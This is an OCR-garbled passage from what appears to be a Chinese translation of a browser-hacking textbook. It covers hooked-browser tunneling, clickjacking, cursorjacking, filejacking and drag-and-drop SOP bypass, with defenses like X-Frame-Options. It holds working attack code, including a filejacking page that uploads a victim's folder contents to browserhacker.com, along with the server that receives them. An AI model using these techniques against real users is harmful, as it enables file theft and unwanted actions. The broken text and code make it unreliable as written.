(4) 代理 后 端 去 掉 并 调整 各 种 首部 ( 比如 Gzip 、Content-length 等 )， 再 将 响应 发 回 到 最 初 向 代 
理发 送 HTTP 请 求 的 客户 端 套 接 字 。 

图 4-7 展 示 了 上 述 四 个 步 又 ,说 明了 隧道 请 求 如 何 基 于 被 勾 连 的 浏览 器 工作 。 


被 勾 连 的 浏览 器 


将 请 求 注入 被 勾 连 \ 
的 浏览 器 (2) Lt) 


发 送 AJAX 请 求 ， 
响应 发 回 到 代理 


将 请 求 转换 成 AJAX 


请 求 







































响应 被 发 回 到 最 
初 的 套 接 字 











GET hooked-domain.com 
HTTP/1.1 





被 勾 连 的 域 


hooked-domain.com 





14-7 ”隧道 代理 高 层 架 构 


发 送 隧 道 请 求 时 ， 上 默认 只 能 访问 与 被 勾 连 的 站 点 同 源 的 资源 ， 因 为 有 SOP。 比 如 ， 如 果 你 勾 
连 的 用 户 访 问 的 是 browservictim.com， 那 你 只 能 请 求 这 个 域 下 的 其 他 网 页 。 这 是 因为 SOP 会 阻止 
你 访问 该 域 之 外 的 资源 。 

然而 ， 绕 过 SOP 之 后 ， 就 可 以 向 该 域 之 外 发 送 代理 请 求 。 换 句 话 说 ， 你 可 以 访问 授权 给 被 勾 
PED Va at HY ES PY OL (通过 cookie session token )。 

举 个 例子 ， 假 设 〈 在 没有 绕 过 SOP 的 情况 下 ) 你 想 攻击 一 个 对 外 公开 的 Web 应 用 。 这 个 Web 
应 用 可 能 有 一 个 WAF (Web Application Firewall，Web 应 用 防火 墙 )， 并 且 配 置 比 较 激 进 ， 在 5 次 
恶意 请 求 之 后 就 会 封 掉 攻击 源 IP。 你 恰好 发 现 了 一 个 DOM XSS， 最 好 的 WAF 对 它 也 束手无策 ， 
那 你 就 可 以 勾 连同 一 公司 的 某 个 内 网 用 户 。 当 然 , WAF 很 可 能 设 有 公司 网 关 地 址 和 网 络 范围 白 名 
单 ， 因 为 来 自 内 部 网 的 攻击 可 能 性 比较 小 。 

此 时 ， 就 可 以 使 用 Tunneling Proxy， 检 测 该 Web 应 用 是 否 存在 其 他 漏洞 。 通 过 隧道 植 人 的 请 
求 源 自 内 部 网 ， 所 以 不 会 引起 WAF 的 警觉 。 理 想 情 况 下 ，WAF 会 完全 忽略 这 些 请 求 ， 毕 竞 它 们 
是 内 部 网 请 求 。9.8 节 还 会 介绍 ， 通 过 Tunneling Proxy 甚 至 可 以 使 用 Burp 和 Sqlmap。 
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另外 ， 源 界面 需要 认证 也 是 在 同 源 中 使 用 Tunneling Proxy 的 一 个 原因 。 比 如 ， 你 发 现 了 一 个 
XSS 后 认证 隐患 ， 然 后 可 以 利用 它 勾 连 某 个 浏览 器 。 使 用 Tunneling Proxy 就 可 以 轻易 浏览 认证 过 
的 应 用 界面 , 事实 上 利用 了 人 勾 连 目标 的 会 话 。 WE EL, 其 至 都 不 用 盗 取 cookie。 重 要 的 是 , HttpOnly 
安全 控制 机 制 此 时 无 效 ， 因 为 是 目标 浏览 器 在 替 你 请 求 资源 。 

而 如 果 你 配合 使 用 Tunneling Proxy 和 绕 过 SOP 技 术 ， 那 么 你 手中 就 有 一 个 开放 的 HTTP 代 理 。 
这 是 因为 可 能 被 钩 联 的 浏览 器 可 以 发 送 跨 域 请 求 ,并 从 所 有 源 读 取 响 应 。 事 实 上 ， 如 果 你 勾 连 了 
多 个 浏览 器 ， 这 些 浏览 器 都 被 实施 SOP 绕 行 ， 那 你 就 有 了 多 个 代理 。 你 可 以 根据 被 勾 连 浏览 器 的 
网 络 带宽 ， 选 择 使 用 某 个 代理 ,或 者 利用 多 个 勾 连 浏览 器 ， 从 多 个 位 置 向 同一 个 源 发 起 攻击 。 


4.3.2. ”利用 再 面 伪 闭 攻击 


界面 伪装 攻击 在 浏览 带 和 应 用 安全 领域 屡见不鲜 。 由 于 社交 网 络 的 发 展 , 病毒 式 无 所 不 在 的 
广告 还 有 “点 赞 ” 按 钮 ， 这 种 形式 的 攻击 可 以 说 空前 昌盛 ”。 
最 广为人知 的 界面 伪装 攻击 是 点 击 劫持 。 显 然 ， 界面 伪装 攻击 还 有 很 多 其 他 形式 , 它们 的 区 
别 主 要 在 于 攻击 者 的 行动 方式 和 可 以 获取 的 信息 。 下 面 将 进一步 分 析 这 些 区 别 , 同时 会 介绍 一 些 
历史 上 曾 依赖 过 拖 放 操作 的 攻击 。 
1. 使 用 点 击 劫持 
点 击 支持 攻击 依赖 于 独立 定位 且 透 明 的 IFrame 和 特殊 的 CSS 选 择 符 ， 以 欺骗 用 户 点 击 不 可 见 
的 元 素 。Jesse Ruderman 在 2002 年 最 早 讨论 了 这 种 攻击 ”之 后 ,这 种 攻击 在 2008 年 被 Robert Hansen 
和 Jeremiah Grossman 改 名 为 Clickjacking。 下 面 这 个 页 面 通过 一 个 IFrame 癌 男 一 个 网 页 中 般 入 了 后 
台 管理 功能 : 
<html> 
<head> 
</head> 
<body> 
<form name="addUserToAdmins" action-"javascript: 
alert ('clicked on hidden IFrame. User added.')" method="POST"> 
<input type="hidden" name-"userId" value"1234"> 
<input type="hidden" name="isAdmin" value"true"> 
<input type="hidden" name="token" value"asasdasd86a 
sd876as87623234aksjdhjkashd"> 
<input type="submit" value="Add to admin group" 
style="height: 60px; width: 150px; font-size:3em"> 
</form> 
</body> 
</html> 
可 以 看 出 ， 这 个 页 面 使 用 防御 XSRF 的 token， 阻止 跨 站 点 请 求 伪造 ( Cross-site Request 
Forgery ) 攻击 。 为 了 演示 需要 ，HTML 表 单 的 action 属 性 里 写 了 一 段 代 码 ， 用 于 显示 一 个 警告 
框 。 如 果 是 真正 的 网 页 ， 这 里 应 该 包含 一 个 接收 输入 值 的 URL。 这 里 ， 如 果 用 户 点 击 了 提交 按 
钮 ， 则 也 为 1234 的 用 户 就 会 被 加 到 管理 员 组 中 。 为 了 发 起 攻击 ， 前 一 个 页 面 被 放 在 以 下 页 面 的 
IFrame 中 : 
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<html> 
<head> 
<style> 

iframe{ 
filter:alpha(opacity=0); 
opacity:0; 
position:absolute; 

top: 250px; 

left: 40px; 

height: 300px; 

width: 250px; 

j 

img { 

position:absolute; 

top: Opx; 

left: Opx; 

height: 300px; 

width: 250px; 

j 

</style> 

</head> 

<body> 

<!-- The user sees the following image--> 
«img src="http://localhost/clickjacking/yes-no_mod.jpg"> 


<!-- but he effectively clicks on the following framed content --> 

«iframe src="http://localhost/clickjacking 
/iframe_content.html"></iframe> 

</body> 

</html> 


结果 如 图 4-8 所 示 。 注 意 ， 看 上 去 页 面 中 好 像 不 存在 另 一 个 框架 ， 而 这 个 看 不 到 的 表单 正 是 
许多 界面 伪装 攻击 能 够 得 过 的 关键 所 在 ， 因 为 攻击 目标 实际 上 会 与 之 交互 。 








[3 localhost/clickjacking/clickjacking_page.html 





图 4-8 ”一 个 明显 没有 什么 问题 的 投票 页 面 ， 有 两 个 按钮 
如 果 把 关于 IFrame 的 前 两 行 CSS 注 释 掉 ， 就 会 消除 不 透明 度 ， 你 就 能 看 到 定位 得 恰到好处 的 
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提交 按钮 ， 如 图 4-9 所 示 。 其 中 ，top 和 1left 属 性 把 Frame 定 位 在 了 图 片 按钮 上 。 


€ SC [) localhost/clickjacking/clickjacking_page.html 


YES NO 





Add to admin group 
Gas Gee 








图 4-9 ”去掉 不 透明 设置 ， 显 露出 真正 的 表单 按钮 





无 论点 击 YES 还 是 NO , 实际 上 真正 点 击 的 是 IFrame 中 HTML 表 单 的 提交 按钮 , 如 图 4-10 所 示 。 


€ > Q'|[)localhost/clickjacking/clickjacking page.html 





The page at localhost says: 


Clicked on hidden IFrame. User added. 





图 4-10 ”点击 了 隐藏 的 提交 按钮 














这 是 坎 骗 用 户 执行 非 预期 操作 的 一 个 简单 示例 。 这 种 攻击 思路 可 以 应 用 到 很 多 场景 ， 比 如 提 
升 一 个 普通 用 户 的 权限 。 这 种 攻击 的 受害 者 可 能 会 是 一 个 拥有 管理 员 权限 的 用 户 。 这 个 用 户 可 能 
确实 登录 到 了 一 个 拥有 前 面 代码 所 展示 功能 的 应 用 中 。 

这 个 应 用 依赖 于 防御 XSRF 的 token， 并 不 影响 使 用 点 击 支持 攻击 。 这 是 因为 放 在 内 符 框 架 中 
的 资源 会 正常 加 载 ， 而 且 也 包含 有 效 的 防御 XSRF 的 token。 针 对 使 用 防御 XSRF 的 token 的 应 用 ， 
点 击 支持 实际 上 是 非常 有 效 的 攻击 手段 ， 可 以 让 这 些 token 提 供 的 保护 失效 。 

第 3 章 讨 论 了 如 何 阻止 在 IFrame 中 加 载 资源 。 那 一 章 的 技术 同样 适用 于 这 里 。 阻 止 界面 伪装 
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攻击 的 一 种 通用 方法 ， 就 是 使 用 X-Frame-Options: DENY 首 部 ( 因为 每 种 攻击 几乎 都 依赖 于 在 
IFrame 中 加 载 资源 ) 下面 还 会 介绍 , 在 某 些 情况 下 , 简单 的 框架 破坏 代码 并 不 足以 防止 某 些 攻击 。 








点 击 劫持 Flash 设 置 管理 器 

Robert Hansen 和 Jeremiah Grossman 对 让 公众 了 解 点 击 劫持 攻击 做 出 了 很 大 贡献 。2008 年 ， 
他 们 成 功 地 实现 了 对 Flash 设 置 管理 器 (Flash Settings Manager ) 的 点 击 劫持 。 

使 用 透明 (opaque=0 ) 的 IFrame 和 div， 他 们 成 功 地 将 Flash Settings Manager 的 Allow 按 钮 
隆 藏 在 了 那些 元 素 之 上 。 攻 击 目标 看 似 在 点 击 某 个 无 害 按钮 ,实则 点 击 了 如 图 4-11 所 示 的 Flash 
设置 部 件 。 





Adobe Flash Player Settings 
Camera and Microphone Access @ 
ha.ckers.org is requesting access to your 
camera and microphone. If you click 
Allow, you may be recorded. 





E» 
p O Allow J(& deny | 











图 4-11 不 透明 的 IFrame 和 div 履 盖 在 了 Flash 部 件 文本 之 上 


这 个 操作 的 影响 在 这 里 是 清晰 可 见 的 ， 它 会 导致 目标 的 隐私 受到 威胁 。 注 意 ， 由 于 显示 在 
Flash 设置 管理 器 中 的 文本 不 可 见 ， 所 以 目标 完全 注意 不 到 ， 也 不 会 知道 点 击 之 后 发 生 了 什么 。 























前 面 的 例子 展示 了 只 使 用 CSS 就 可 以 实现 点 击 劫持 。 如 果 你 想 通 过 攻击 获得 目标 的 动态 信 
息 ， 比 如 鼠标 移动 ， 可 以 再 用 JavaScript。jJavaScript 非 常 灵活 ， 可 以 让 你 取得 当前 鼠标 位 置 的 坐 
标 值 。 这 样 ， 即 使 设计 复杂 的 点 击 劫持， 比如 要 多 次 点 击 才 能 得 到 结果 ， 也 会 非常 便捷 。 

设想 有 一 个 页 面 ， 需 要 用 户 点 击 其 中 的 按钮 来 实现 攻击 。 此 时 , 点 击 劫持 的 目标 就 是 保证 目 
标的 鼠标 始终 位 于 该 按钮 上 面 。 这 样 , 只 要 攻击 目标 一 点 击 , 你 就 会 取得 想 要 的 结果 ,Rich Lundeen 
和 Brendan Coles 专 门 为 实现 这 个 技术 写 了 一 个 BeEF 命 令 模 块 ”。 

这 种 情况 需要 两 个 框架 , 一 个 内 部 框架 和 一 个 外 部 框架 。 外 部 框架 加 载 你 想 通 过 点 击 劫持 攻 
击 利用 的 目标 源 。 内 部 框架 负责 侦 听 onmousemove 事 件 ， 其 位 置 随 当 前 鼠标 指针 位 置 移动 。 这 
样 ， 鼠 标 光 标 始终 位 于 你 希望 用 户 点 击 的 目标 之 上 。 

下 面 使 用 jQuery API 的 代码 会 让 outerobj 始 终 跟 随 鼠 标 : 



















































































» 


Sj ("body") .mousemove(function(e) { 
$j (outerObj).css('top', e.pageY); 
$j(outerObj).css('left', e.pageX); 

3): 


内 部 框架 使 用 不 透明 技术 来 泻 染 不 可 见 元 素 : 


filter:alpha(opacity=0) ; 
opacity:0; 
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下 面 这 个 示例 页 面 就 是 点 击 劫持 攻击 的 目标 页 面 。 你 希望 用 户 点 击 Add User 按 钮 ， 这 里 点 击 
它 只 会 弹 层 。 为 了 更 好 地 演示 ， 这 里 为 body 添 加 了 background 属 ' 


<html> 

<head> 

</head> 

<body style="background-color:red"> 

<p>&nbsp; </p> 

«button onclick-"javascript:alert('User Added')" \ 
type="button">Add User to Admin group</button> 
<p>&nbsp; </p> 

</body> 

</html> 


如 果 通 过 BeEF 模 块 启动 对 这 个 页 面 的 点 击 动 持 ， 那么 所 有 点 击 都 会 被 发 送 到 框架 中 ， 结 果 
如 图 4-12 和 图 4-13 所 示 。 正 如 你 所 见 ， 框 架 始终 跟随 鼠标 移动 ， 因 此 无 论 用 户 点 击 页 面 中 的 任何 
地 方 ， 实 际 点 击 的 都 将 是 Add User 按 钮 。 








(4x) | @ 127.0.0.1:3000/demos/basic.htm 
You should be hooked into BeEF. 
Have fun while your browser is working against you. 


These links are for demonstrating the "Get Page HREFs" command module 


+ The Browser Exploitation Framework Project homepage 


e ha.ckers.org homepage 


* Slashdot is User to A 
BEL 


Have a go at the event logger. 
Insert your secret here: 


You can also load up a more advanced demo page here 





图 4-12 ”框架 受 受 地 跟随 着 鼠标 


BeEF Basic Demo | + | 





(4) $ || @ 127.0.0.1:3000/demos/basic.htm! 
You should be hooked into BeEF. 
Have fun while your browser is working against you. 


These links are for demonstrating the "Get Page HREFs" command module i 
ser to 
. B loitation Wi ject he 


。 ha.ckers.org homepage 
e Slashdot 


Have a go at the event logger. | 
Insert your secret here: | ] 


You can also load up a more advanced demo page here 





图 4-13 ”光标 始终 在 按钮 上 方 
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用 户 点 击 鼠 标 就 会 触发 框架 页 面 中 按钮 的 onclick 事 件 。 结 果 就 会 得 到 如 图 4-14 所 示 的 一 个 
警告 对 话 框 。 





(a) || @ 127.0.0.1:3000/demos/basic.htm! 








图 4.14 “成功 实现 点 击 支持 


注意 , 在 前 面 的 例子 中 ,为 了 演示 需要 , 我们 隐藏 了 框架 的 内 容 。 正 因为 如 此 ,我 们 才能 
到 其 背景 和 鼠标 光标 下 面 的 按钮 。 
2. 使 用 光标 支持 
本 节 讨 论 与 点 击 支持 攻击 类 似 的 光标 动 持 ( cursorjacking )。 光 标 劫持 适合 构造 复杂 界面 伪装 
攻击 的 情况 。 
NoScript ClearClick 
NoScript 是 一 个 流行 的 Firefox 扩 展 ， 用 于 阻止 XSS、XSRF 及 各 种 界面 伪装 攻击 。 其 
ClearClick32 功 能 可 以 才 用 户 识别 并 阻止 点 击 支持 攻击 ， 方 法 是 对 框架 中 的 页 面 及 父 页 面 做 快 


有 照 。 如 果 两 个 快照 不 同 ， 就 判断 为 点 击 劫持 。 使 用 这 个 技术 ，NoScript 不 仅 可 以 识别 利用 页 面 
上 透明 元 素 制 造 的 点 击 劫持 攻击 ， 还 可 以 识别 哪些 元 素 可 能 正在 被 用 来 发 起 点 击 劫持 攻击 。 





第 一 个 光标 劫持 的 例子 来 源 于 Eddy Bordi， 后 来 经 过 Marcus Niemietz 改 进 ”。 光 标 劫 持 使 用 
伪造 的 光标 坎 骗 用 户 ， 伪 造 的 光标 与 实际 光标 有 偏离 ,一 般 向 右 偏离 。 这 样 攻击 者 可 以 诱 使 目标 
点 击 自己 定位 好 的 元 素 。 来 看 看 下 面 的 页 面 : 


<html> 
<head> 
<style type="text/css"> 
4c { 
cursor:url("http://localhost/basic cursorjacking 
/new cursor.png"),default; 


} 
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dc input{ 

cursor:url ("http://localhost/bas 
/new cursor.png"),default; 

j 

</style> 

</head> 

<body> 

<hl> CursorJacking. Click on the 

<div id="c"> 
«input type-"button" value-"Firs 
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &n 
«input type="button" 
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &n 
«input type-"button" 
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &n 
«input type-"button" value-"Four 
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &n 

«/div» 

«/body» 

</html> 





这 里 的 CSS 用 一 张 自 定义 图 片 代 替 了 鼠标 光标 。 如 图 4-15$ 所 示 , 





固定 距离 的 鼠标 图 标 。 

为 了 演示 需要 , 图片 的 背景 是 可 见 的 。 
攻击 目标 点 击 页 面 中 ee 四 个 按钮 ， 
位 置 被 新 的 光标 图 片 给 隐藏 





€ > CG) | localhost/basic cursorjacking/page. 


value="Second" 


value="Third" 


ic_cursorjacking 


'Second' or 'Fourth' buttons. «/h1» 


t" onclick-"alert('clicked on 1')"> 
bsp; &nbsp; &nbsp; 
onclick-"alert('clicked on 2')"> 
bsp; &nbsp; &nbsp;<br></br> 
onclick-"alert('clicked on 3')"> 
bsp; &nbsp; &nbsp; 
th" onclick="alert ( 
bsp; &nbsp; &nbsp; 


‘clicked on 4')"> 





这 张 图 片 中 是 一 个 向 右 偏 移 


在 真正 的 攻击 中 , 会 采用 透明 背景 的 PNG 图 片 。 如 果 


实际 上 点 击 的 却 是 页 面 左 侧 的 按钮。 


html# 





CursorJacking. Click on 


the 'Second' or 'Fourth' buttons. 


The page at localhost says: 
clicked on 1 


图 4-15 





点 击 第 二 个 按钮 ， 





结果 点 击 的 是 第 一 个 


鼠标 光标 真正 的 


Krzysztof Kotowicz”“ 和 Mario Heiderich 扩 展 了 光标 劫持 技术 。 他 们 的 攻击 途径 依赖 于 将 光标 


完全 隐藏 在 页 面 主 体 中 ， 并 给 


<body style="cursor:none"> 


全 页 面 元 素 添加 如 下 样式 : 
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然后 再 结合 mousemove 事 件 ,动态 给 光标 覆盖 不 同 的 光标 图 片 。 下 面 的 代码 说 明了 这 一 





<html> 
<head><title>Advanced cursorjacking by Kotowicz & Heiderich</title> 
<style> 
body, html (margin:0;padding:0) 
</style> 
</head> 
«body style-"cursor:none;height: 1000px;"> 
«img style-"position: absolute;z-index:1000;" id-cursor 
src-"cursor.png" /» 
«div style=margin-left:300px; "> 
«hi»Is this a good example of cursorjacking?</h1> 
</div> 
<button style="font-size: 
150%;position:absolute;top:130px; left: 630px; ">YES</button> 
<button style="font-size: 150%;position:absolute;top:130px; 
left:680px; ">NO</button> 
«div style="opacity:1;position:absolute;top:130px;left:30px; "> 
<a href="https://twitter.com/share" class="twitter-share-button" 
data-via="kkotowicz" data-size="small">Tweet</a> 
<script>!function(d,s,id) {var 
js,fjs-d.getElementsByTagName(s)[0];if(!d.getElementById(id)) 
{js=d.createElement (s);js.id=id;js.src="//platform.twitter.com/ 
widgets.js";fjs.parentNode.insertBefore(js,fjs);)) (document, 
"Script","twitter-wjs");«/script» 
</div> 
«script» 
function shake(n) ( 
if (parent.moveBy) { 
for (T s XU; as Us 二 二 =) 
for. (j= n; 3 > 0; j--) 
parent .moveBy (0 
parent .moveBy (i 
parent .moveBy (0 
parent .moveBy (- 





{ 
{ 
i); 
0); 
-i); 
0); 


a 7 


shake (5); 
var oNode = document.getElementById('cursor'); 


var onmove = function (e) { 
var nMoveX = e.clientX, nMoveY = e.clientyY; 
oNode.style.left = (nMoveX + 600)+"px"; 


oNode.style.top = nMoveY + "px"; 
LG 
document .body.addEventListener('mousemove', onmove, true); 
</script> 
</body> 


技术 : 


首先 ， 用 一 张 自 定义 图 片 代替 鼠标 光标 图 片 。 然 后 ， 为 页 面 主体 添加 一 个 新 的 事件 监听 器 ， 
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监听 mousemove 事 件 。 用 户 移动 鼠标 时 ， 事 件 会 触发 监听 器 ， 从 而 让 伪造 的 (可 见 的 ) 鼠标 光标 
也 相应 移动 。 

通过 JavaScript， 可 以 让 伪造 的 光标 跟随 真正 的 光标 移动 ( 在 坐标 上 )。 实 际 上 ， 上 一 节 中 ， 
高 级 的 点 击 劫持 技术 中 也 使 用 了 相同 的 技术 。 结 果 如 图 4-16 所 示 ， 在 目标 点 击 YES 按 钮 时 ， 他 们 
实际 上 点 击 的 是 Twitter 按钮 。 





























Lx Q | [D localhost/advanced cursorjacking/page.html Q v 


Is this a good example of cursorjacking? 





woes o YES NO 

















图 4-16 ”以 为 点 击 了 YES 按 钮 ， 结 果 是 点 击 了 Twitter 按钮 


最 初 ， 这 种 光标 动 持 技术 绕 过 了 了 NoScript 的 ClearClick 保 护 机 制 。 你 应 该 还 记得 前 面 介绍 的 
ClearClick 提 供 了 什么 保护 , 它 能 够 识别 在 透明 元 素 ( opaque=0 ) 上 的 点 击 。 而 在 前 面 的 例子 中 ， 
真正 的 点 击发 生 在 页 面 上 透明 的 区 域 ( Twitter 按钮 ), 因此 NoScript 无 能 为 力 。 这 种 绕 过 ClearClick 
的 攻击 已 经 在 NoScript 的 2.2.8 RCI 中 给 出 了 解决 方案 5。 

3. 使 用 文件 劫持 

文件 动 持 ( Filejacking )， 就 是 通过 浏览 需 中 巧妙 的 UI 操 作 ， 把 攻击 目标 0S 中 的 文件 夹 内 容 
转移 到 攻击 者 的 服务 器 。 结 果 就 是 在 其 些 条 件 下 ,可 以 下 载 攻 击 目标 机 器 上 的 文件 。 成 功 实施 这 
种 攻击 有 两 个 必要 条 件 。 

(1) 攻击 目标 必须 使 用 Chrome， 因 为 这 是 目前 唯一 支持 airectorvy 和 webkitdirectory 输 
人 属性 的 浏览 器 : 

<input type="file" id="file_x " webkitdirectory directory /> 

(2) 必须 成 功 引诱 目标 点 击 某 个 地 方 , 这 类 似 于 其 他 界面 伪装 技术 。 此 时 , 通过 前 面 的 opacity 
CSS 技 术 ， 将 一 个 输入 元 素 隐藏 在 按钮 元 素 后 面 。 

2011 年 ， 在 分 析 了 通过 社会 工程 技术 引诱 用 户 实施 文件 劫持 之 后 ，Kotowicz “首先 发 表 了 这 
种 界面 伪装 研究 。 

文件 劫持 攻击 依赖 于 目标 在 从 网 上 下 载 文件 时 使 用 的 是 操作 系统 的 Choise Folder 对 话 框 。 为 
了 保证 攻击 效果 , 应 该 尝试 引诱 用 户 选 择 包含 敏感 文件 的 文件 夹 ， 比 如 利用 看 起 来 可 信 的 钓鱼 内 
容 。 图 4-17 展 示 了 如 果 他 们 选择 了 Download to... 按 钮 ， 攻 击 目 标 会 看 到 什么 。JavaScript 会 枚 举 
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图 4-17 点击 Download to...， 打 开 选 择 文件 夹 对 话 框 
看 一 看 下 面 这 些 服务 器 端的 Ruby 代 码 : 


require 'rubygems' 
require 'thin' 
require 'rack' 
require 'sinatra' 





class UploadManager < Sinatra::Base 
post "/" do 
puts "receiving post data" 
params.each do |key,value| 
puts "#{key}->#{value}" 
end 
end 
end 


@routes = { 
"/upload" => UploadManager.new 


} 


Grack app = Rack: :URLMap.new(@routes) 
Gthin = Thin::Server.new("browserhacker.com", 4000, @rack_app) 


Thin: :Logging.silent = true 
Thin: :Logging.debug = false 


puts "[#{Time.now}] Thin ready" 
Gthin.start 


这 段 代 码 将 Ruby Web 服 务 器 Thin 绑 定 在 4000 端 口 ， 准 备 好 处 理发 送 到 /upload URI 的 POST 
请 求 。 在 有 POST 请 求 发 送 过 来 时 ， 将 内 容 打 印 到 控制 台 ， 如 图 4-18 所 示 。 
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这 个 攻击 示例 的 客户 端 部 分 的 JavaScript 代 码 如 下 。 注 意 ，cloak 按 钮 和 cloakeq 输 入 元 素 的 
不 透明 度 都 设 为 0 了 。 它 们 会 被 可 见 的 按钮 元 素 盖 住 。 在 目标 想 点 击 按钮 时 ， 实 际 上 点 击 的 是 输 
入 元 素 ， 而 且 认 为 自己 应 该 选择 一 个 下 载 目标 ， 如 图 4-17 所 示 。 

攻击 目标 点 击 了 输入 元 素 后 ， 就 会 选择 一 个 下 载 目标 。 然 后 ， 会 触发 输入 元 素 的 onchange 
事件 ， 并 执行 相关 的 匿名 函数 。 这 样 就 会 枚 举 选 中 下 载 目 标 中 的 文件 ， 并 会 使 用 Formpata 对 象 
修改 内 容 的 格式 。 最 后 ， 这 些 文件 会 通过 一 个 跨 域 的 XMLHEtpRecuest POST 请 求 被 提取 出 来 。 
换 名 话说， 就 是 会 枚 举 选 中 文件 夹 中 的 所 有 文件 ， 然 后 逐个 将 它们 上 传 到 你 的 服务 器 。 


<html> 
<head> 
<script src-"http://ajax.googleapis.com/ajax/libs 
/jquery/1.5.2/jquery.min.js" type="text/javascript"></script> 
<style> 
body (background: #333; color: #eee; } 
a:link, a:visited {color: lightgreen; } 
input [type='file'] { 
opacity: 0; 
position: absolute; 
left: 0; top: 0; 
width: 300px; 
line-height: 20px; 
height: 25px; 


















































j 

#cloak { 
position: absolute; 
left: 0; 
top: 0; 
line-height: 20px; 
height: 25px; 
cursor: pointer; 








j 
label { 
display: block; 
j 
</style> 
</head> 
<body> 
<button id=cloak>Download to...</button> 
<input type="file" id="cloaked" webkitdirectory directory /> 
<script> 
document .getElementById ("cloaked") .onchange = function(e) { 
for (var i = 0, f; f = e.target.files[i]; ++i) { 
console.log("sending file with path: " + 
f.webkitRelativePath + ", name: " + f.name); 
fdata = new FormData(); 
fdata.append('path', f.webkitRelativePath); 
fdata.append('name', f.name); 
fdata.append('content', f); 
var xhr = new XMLHttpRequest (); 
xhr.open("POST", "http://browserhacker.com/upload", true); 
xhr.send(fdata); 





we 


</script> 
</body> 
</html> 


注意 , 前 面 两 段 代码 并 不 同 源 , 但 这 不 会 妨碍 攻击 。 在 Gecko 和 WebKit 内 核 的 Firefox , Chrome 
和 Safari 中 ， 文 件 都 可 以 从 目标 操作 系统 中 被 提取 出 来 。 在 跨 域 的 时 候 ， 尽 管 无 法 读 取 响 应 ， 但 
这 些 浏览 器 仍然 会 发 送 XMLHt tpRequest 请 求 。 当 然 ，Opera 等 浏览 器 则 不 会 。 第 9 章 和 第 10 章 将 
进一步 讨论 这 种 行为 对 很 多 新 攻击 方法 的 重大 影响 。 


i lon-sp-Sdv7p:filejacking morru$ ruby server.rb 

| [2013-02-28 17:00:00 +0000] Thin ready 

| receiving post data 

| path-»PRIVATE. DOCUMENTS/private. 001 
name-»private. 001 
content-»[:filenames»"private 001", :types»"application/octet-stream", :name=>"content", :tempfi 
Le=>#<File:/var/folders/jd/s257v1zx47d6sz8j jgn0hk785g48mz/T/RackMultipart20130228-95445-rwwjes», 
:heade»"Content-Disposition: form-data; name=\"content\"; filenames "PRIVATE. DOCUMENTS/pri vate.. 
001N"NrNnContent-Type: application/octet-stream\r\n"} 
receiving post data 
path-»PRIVATE. DOCUMENTS/pri vate. 002 
name-»private. 002 
content-»(:filename-»"private. 002", :type-»"application/octet-stream", :name-»"content", :tempfi 
le=>#<File:/var/folders/jd/s257v1zx47d6sz8j jgn@hk785q48mz/T/RackMul ti part20130228-95445-1we@mh2> 
, thead=>"Content-Disposition: form-data; name=\"content\"; filename=\"PRIVATE_DOCUMENTS/private 
-002N"NrNnContent-Type: application/octet-stream\r\n"} 




















Head. Previ... Respo.. Timi... 


zs] filejacking.htmi Referer: http://localhost/filejacking. html 
= User-Agent: Mozilla/5.@ (Macintosh; Intel Mac OS X 10 8 2) AppleWebKit/537.22 (KHTML, liM 
7.22 
Y Request Payload 
—————-WebK it FormBoundary3TFbuxINfSf93KSk 
upload Content-Disposition: form-data; name="path" 
L dvsl.local 


jquery.minjs 
apis.com/aj 


PRIVATE, DOCUMENTS/private 001 
upload LA "WebKitFormBoundary3TFbuxlNfSf93KSk 
LJ Content-Disposition: form-data; name="name" 
private 001 
————-hebK it FormBoundary3TFbux INfSf93KSk 
Content-Disposition: form-data; name="content"; filename-"PRIVATE DOCUMENTS/private 001" 
Content-Type: application/octet-stream 


图 4-18 ” 跨 域 发 送 POST 数 据 





4. 使 用 拖 放 

不 一 致 的 SOP 实 现 会 导致 安全 隐患 的 另 一 个 例子 是 拖 放 界 面 伪装 攻击 。 利 用 目标 浏览 器 中 的 
这 类 漏洞 ， 可 以 跨 域 窃取 内 容 。Michal Zalewski 在 2010 年 年 末 较 早 地 披露 了 这 种 攻击 了。 当时 ， 
他 报告 了 Firefox 的 一 个 漏洞 (2012 年 打上 了 补丁 )， 说 在 执行 跨 域 拖 放 操作 时 没有 SOP 限 制 。 

可 以 在 你 控制 的 钓鱼 页 面 中 , 创建 一 个 内 向 框架 。 该 框架 来 源 指向 一 个 跨 域 资源 ， 如 果 用 户 
拖 动 该 框架 并 在 顶级 窗口 的 某 个 地 方 放 开 ， 就 可 以 绕 过 SOP 读 取 该 框架 的 内 容 。 

通过 欺骗 用 户 可 以 令 其 做 出 这 种 行为 。 比 如 ， 显 示 一 个 简单 的 把 元 素 拖 放 到 页 面 中 的 游戏 。 
被 拖 放 的 元 素 实际 上 是 一 个 内 髓 框架 ， 而 你 想 要 读 取 其 中 的 内 容 。 

应 用 这 一 技术 的 第 一 个 PoC， 在 内 骨 框 架 中 使 用 了 view-source://， 例 如: 


<iframe src="view-source:http://browservictim.com/any"> 
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使 用 view-source 加 载 的 资源 会 泻 染 原始 的 HTML。 坎 骗 用 户 把 放 在 框架 中 的 内 容 拖 放 到 项 
级 窗口 有 很 多 好 处 ， 包 括 读 取 防 御 XSRF 的 token 及 其 他 可 以 从 HTMLI 源 文件 中 读 到 的 内 容 。 

Firefox 在 2011 年 年 末 修 正 了 这 个 问题 ， 禁 用 了 跨 域 拖 放 操作 。Kotowicz 发 现 了 男 一 个 绕 过 此 
限制 的 有 趣 方式 ， 而 该 方式 在 本 书写 作 时 仍然 在 Firefox 中 奏效 。 这 个 技术 就 是 “Fake Captcha" ?*, 
涉及 一 个 极端 用 例 。 具 体 来 说 ,仍然 需要 在 内 向 框架 中 以 view-source 打 开 内 容 ， 把 你 想 要 获取 
的 内 容 以 准确 的 偏 移 量 定位 在 顶级 窗口 中 。 这 个 技术 在 利用 一 个 事实 ， 那 就 是 有 的 用 户 习 惯 于 通 
过 三 击 鼠 标 或 按 Ctrl+C 把 输入 框 中 的 内 容 复制 到 剪贴 板 ， 而 这 样 操作 会 把 所 有 内 容 都 复制 出 去 。 
此 时 ,用户 可 能 不 知道 ,显示 在 输入 框 中 的 内 容 ,， 实际 上 只 是 内 舰 框架 中 原始 HTML 的 一 小 部 分 。 
